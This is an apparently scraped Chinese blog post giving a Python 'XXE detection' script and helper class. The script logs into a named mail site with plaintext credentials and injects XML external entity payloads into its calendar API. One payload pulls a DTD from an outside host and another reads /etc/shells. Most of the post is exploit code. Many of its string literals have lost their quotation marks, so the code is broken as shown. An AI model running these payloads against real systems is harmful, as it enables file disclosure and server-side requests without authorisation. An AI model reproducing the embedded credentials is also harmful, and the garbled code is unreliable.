python编写的面向对象的XXE自动化检测工具(对单个功能进行检测)

import XXE_check
if __name__=="__main__":
    try:
        check=XXE_check.xxe_check()
        #登录
        input_url="http://mail.richinfo.cn/"
        getLoginUrl="http://mail.richinfo.cn/webmail/login/loginapi.do"
        getLoginDict={
                        usernumber:"zhangxinxin",
                        password:"xinxin123",
                        validateCode:"",
                        returnurl:"http%3A%2F%2Fmail.richinfo.cn%2Fwebmail%2Flogin%2Flogin.do",
                        loginType:"WEB",
                        version:"version",
                        userid:"zhangxinxin",
                        mailType:"0",
                        passwordType:"0",
                        domain:"richinfo.cn",
                        mobileNumber:"zhangxinxin",
                        model:"MAIL"        
                    }

        check.login(input_url,getLoginUrl,getLoginDict)
        sid=check.get_sid()
#        print("main_sid=%s"% sid)
        
        #添加用例(<!DOCTYPE svg SYSTEM "http://oa05.com/11.dtd">)
        add_url="http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid="+sid
        add_dict1=<!DOCTYPE svg SYSTEM "http://oa05.com/11.dtd"><object><int name="comeFrom">0</int><string name="validImg" /><string name="dateDesc" /><int name="calendarType">10</int><string name="title">test</string><string name="site">test</string><string name="content">test&test;</string><int name="labelId">10</int><string name="color">#319eff</string><int name="beforeTime">15</int><int name="beforeType">0</int><int name="recMyEmail">1</int><int name="recMySms">0</int><int name="enable">1</int><string name="recEmail">[email protected]</string><string name="dateFlag">2014-10-29</string><string name="endDateFlag">2014-10-29</string><string name="startTime">1830</string><string name="endTime">1930</string><int name="sendInterval">0</int><string name="week">0000000</string></object>.encode("ascii")
        #查看
        test_url="http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid="+sid
        test_dict=<object><int name="comeFrom">0</int><string name="startDate">2014-10-29</string><string name="endDate">2014-10-29</string><int name="maxCount">0</int></object>.encode("ascii")
        seqNos1=check.XXE_go(add_url,add_dict1,test_url,test_dict)
        print("测试用例为:<!DOCTYPE svg SYSTEM ‘http://oa05.com/11.dtd’>")
#        print(seqNos1)

        #删除
        del_url="http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid="+sid
        del_dict=(<object><int name="comeFrom">0</int><int name="seqNos">+str(seqNos1)+</int><int name="actionType">0</int></object>).encode("ascii")
        check.del_test(del_url,del_dict)

        #添加用例(<!DOCTYPE ANY [<!ENTITY all SYSTEM "file:///etc/shells">]>)
        add_url="http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid="+sid
        add_dict2=<!DOCTYPE ANY [<!ENTITY all SYSTEM "file:///etc/shells">]><object><int name="comeFrom">0</int><string name="validImg" /><string name="dateDesc" /><int name="calendarType">10</int><string name="title">test</string><string name="site">test</string><string name="content">test&all;</string><int name="labelId">10</int><string name="color">#319eff</string><int name="beforeTime">15</int><int name="beforeType">0</int><int name="recMyEmail">1</int><int name="recMySms">0</int><int name="enable">1</int><string name="recEmail">[email protected]</string><string name="dateFlag">2014-10-29</string><string name="endDateFlag">2014-10-29</string><string name="startTime">1830</string><string name="endTime">1930</string><int name="sendInterval">0</int><string name="week">0000000</string></object>.encode("ascii")
        #查看
        test_url="http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid="+sid
        test_dict=<object><int name="comeFrom">0</int><string name="startDate">2014-10-29</string><string name="endDate">2014-10-29</string><int name="maxCount">0</int></object>.encode("ascii")
        seqNos2=check.XXE_go(add_url,add_dict2,test_url,test_dict)
        print("测试用例为:<!DOCTYPE ANY [<!ENTITY all SYSTEM ‘file:///etc/shells’>]>")
#        print(seqNos2)

        #删除
        del_url="http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid="+sid
        del_dict=(<object><int name="comeFrom">0</int><int name="seqNos">+str(seqNos2)+</int><int name="actionType">0</int></object>).encode("ascii")
        check.del_test(del_url,del_dict)
        
    except Exception as e:
        print(e)

 

import urllib.request,http.cookiejar,re
class xxe_check:
    def __init__(self):
        self.cj=http.cookiejar.CookieJar()     #获取cookie
        #引用cookie
        self.opener=urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cj))
        self.opener.addheaders=[(Content-Type,application/x-www-form-urlencoded)]

    #登录
    def login(self,input_url,getLoginUrl,getLoginDict):
        resp=self.opener.open(input_url)
        postData=urllib.parse.urlencode(getLoginDict);
        postData=postData.encode(utf-8)
        resp2=self.opener.open(getLoginUrl,data=postData)
        #getLoginResponse=resp2.read().decode("utf-8")
        #print("getLoginResponse:%s"% getLoginResponse)
        f=open("cookie.txt","w")
        for c in self.cj:
#            print(c.name,"="*6,c.value)
            f.write(c.name+"="+c.value+";")
            f.write(c.name+"="+c.value+";"+"\n")
            
    #获取sid
    def get_sid(self):
        #先从本地读取cookie,然后在截取其中sid的值
        f=open("cookie.txt")
        allmsg=f.read()
        sid_location=allmsg.find("lang")
#       print(sid_location)
        sid=allmsg[sid_location+4:sid_location+42]
        return sid
    
    #执行XXE用例
    def XXE_go(self,add_url,add_dict,test_url,test_dict):
        try:
#            print("++++++++++++++++++++")
            resadd=self.opener.open(add_url,data=add_dict)
#            print("*********************************")
            for_seqNos=resadd.read().decode("utf-8")
            seqNos=for_seqNos[for_seqNos.find("seqNo")+7:for_seqNos.find("seqNo")+10]
#            print("for_seqNos:%s"% for_seqNos)
#            print("seqNos_test:%s"% seqNos)
            if for_seqNos.find("S_OK")>0:
                #查看日历
                riliresult=self.opener.open(test_url,data=test_dict)
                all_msg=riliresult.read().decode("utf-8")
                begin_msg=all_msg.find(seqNos)
                msg=all_msg[begin_msg:begin_msg+1000]
                end_msg=msg.find("}")
                print(msg)
                if msg[begin_msg:end_msg].find("/bin/sh")>0:
 #                   print(type(seqNos))
                    print("存在XXE漏洞")
                else:
                    print("不存在XXE漏洞")
            else:
                print("没有发现XXE漏洞")
            #判断seqNOS的值是否为空
            if seqNos.strip()=="":
                return 0
            elif int(seqNos)>0:
                return seqNos
        except Exception as e:
            print(e)

    #删除添加的内容
    def del_test(self,del_url,del_dict):
        res=self.opener.open(del_url,data=del_dict)
        if res.read().decode("utf-8").find("code":"S_OK")>0:
            print("删除成功!")
        else:
            print("删除失败!")











        

 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。